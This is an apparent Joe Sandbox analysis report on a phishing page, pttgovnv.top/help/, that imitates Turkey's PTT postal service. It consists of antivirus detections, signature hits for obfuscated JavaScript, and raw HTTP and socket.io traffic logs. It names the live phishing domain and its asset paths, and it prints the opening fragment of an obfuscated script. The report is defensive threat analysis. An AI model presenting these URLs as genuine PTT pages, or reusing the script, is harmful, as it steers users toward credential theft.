Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://pttgovnv.top/help/

Overview

General Information

Sample URL:https://pttgovnv.top/help/
Analysis ID:1502512
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
HTML page contains obfuscated javascript
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 1360 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 280 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=1988,i,3916149718589674385,9428878303395557507,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6340 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pttgovnv.top/help/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://pttgovnv.top/help/Avira URL Cloud: detection malicious, Label: phishing
Source: https://pttgovnv.top/help/SlashNext: detection malicious, Label: Fraudulent Website type: Phishing & Social Engineering
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=-SnapXukcxVrNsxsBQUEAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liRdk&sid=psKQgyFLGrrSy6S3BQUXAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liLz4&sid=HJNOcZ3ULtSedHtaBQT_Avira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liSfo&sid=6Pzg8-8CUphQpNENBQUaAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/api/MC4zMTIwODY0MDU2MjE5NDY4Avira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/layout/images/39.pngAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/77985128JxKnW.jsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/8b4af40ckFGym.cssAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liPXR&sid=Jgob5dOCMvYo_mojBQURAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/layout/images/47.pngAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liVXF&sid=M3Npq313xU4h1v3KBQUgAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liPjD&sid=Jgob5dOCMvYo_mojBQURAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liOSJ&sid=6dVwkVmS0CuJG3kJBQULAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liQtD&sid=HHxSQQKw-ZFDRlk7BQUUAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liOuY&sid=6dVwkVmS0CuJG3kJBQULAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/c27b6911JxKnW.jsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=Jgob5dOCMvYo_mojBQURAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liTioAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liWNmAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liatIAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=QB7JMh6ogzHtMo_gBQUsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/4cd1ec68kFGym.cssAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liWjb&sid=xdKg7EXtPfKxJvHtBQUjAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/layout/images/32.pngAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6lica0&sid=qmawR9H0vci5rE9hBQUvAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6licMl&sid=qmawR9H0vci5rE9hBQUvAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/164f9b57JxKnW.jsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liWje&sid=xdKg7EXtPfKxJvHtBQUjAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liPXX&sid=Jgob5dOCMvYo_mojBQURAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liLtF&sid=HJNOcZ3ULtSedHtaBQT_Avira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/8560f9bdkFGym.woffAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=psKQgyFLGrrSy6S3BQUXAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liNOP&sid=YADBSRy9yTc5Jzd9BQUIAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/layout/images/43.pngAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liaGK&sid=NtB8sH50cFJwILuEBQUpAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liYKN&sid=fJmUnpo66zoSBdWxBQUmAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liMdh&sid=-SnapXukcxVrNsxsBQUEAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=qmawR9H0vci5rE9hBQUvAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=6dVwkVmS0CuJG3kJBQULAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/layout/images/52.pngAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liSE9Avira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/layout/images/35.pngAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/f3c7e6fbJxKnW.jsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/f4397cedkFGym.cssAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6lib3N&sid=QB7JMh6ogzHtMo_gBQUsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liP4B&sid=6dVwkVmS0CuJG3kJBQULAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liLtD&sid=HJNOcZ3ULtSedHtaBQT_Avira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/f6170fbbkFGym.cssAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/cbcdcea5JxKnW.jsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/layout/images/38.pngAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/37d8eb31JxKnW.jsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liVkz&sid=M3Npq313xU4h1v3KBQUgAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6libQf&sid=QB7JMh6ogzHtMo_gBQUsAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/assets/f18e42bakFGym.woffAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liNah&sid=YADBSRy9yTc5Jzd9BQUIAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=YADBSRy9yTc5Jzd9BQUIAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liPMvAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/frames/0/index.htmlAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liZcAAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liV9dAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liL4QAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/layout/images/44.pngAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liY09&sid=fJmUnpo66zoSBdWxBQUmAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liRRl&sid=psKQgyFLGrrSy6S3BQUXAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liRoX&sid=psKQgyFLGrrSy6S3BQUXAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liPj7&sid=Jgob5dOCMvYo_mojBQURAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liR2r&sid=HHxSQQKw-ZFDRlk7BQUUAvira URL Cloud: Label: phishing
Source: https://pttgovnv.top/help/Virustotal: Detection: 17%Perma Link

Phishing

barindex
Source: https://pttgovnv.top/help/assets/37d8eb31JxKnW.jsHTTP Parser: const a9_0x13d023=a9_0x3647;(function(_0x1c0f4c,_0x5b4f7e){const _0x18c0e3=a9_0x3647,_0x35d09c=_0x1c
Source: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxHTTP Parser: Number of links: 0
Source: https://pttgovnv.top/help/HTTP Parser: Base64 decoded: sts/UrunHizmet/Attachments/55/web sitesi alt logolar_3-06.png" class='ptt-productimage'></a></div><div class='transition ptt-productimage-holder col-lg-1 col-md-2 col-sm-3 col-xs-4'><a href="https://www.ptt.gov.tr/Sayfalar/Kargo/PttYurtIciKargoHizmetleri....
Source: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxHTTP Parser: Title: AloChat does not match URL
Source: https://pttgovnv.top/help/HTTP Parser: No favicon
Source: https://pttgovnv.top/help/HTTP Parser: No favicon
Source: https://pttgovnv.top/help/HTTP Parser: No favicon
Source: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxHTTP Parser: No favicon
Source: https://www.ptt.gov.tr/Sayfalar/Posta/PulVeFilateliUst.aspxHTTP Parser: No favicon
Source: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxHTTP Parser: No <meta name="author".. found
Source: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.40
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.40
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /help/ HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/index-f5457718.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/f6170fbbkFGym.css HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/77985128JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/37d8eb31JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /help/assets/2dd339f2kFGym.css HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/4cd1ec68kFGym.css HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/c16a2af0JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/ec21517bJxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/09bf01f8JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/f3c7e6fbJxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/index-f5457718.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/77985128JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/c27b6911JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/37d8eb31JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/cbcdcea5JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/0e738ae1JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttgovnv.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/09bf01f8JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/ec21517bJxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/c16a2af0JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/f3c7e6fbJxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/cbcdcea5JxKnW.js HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
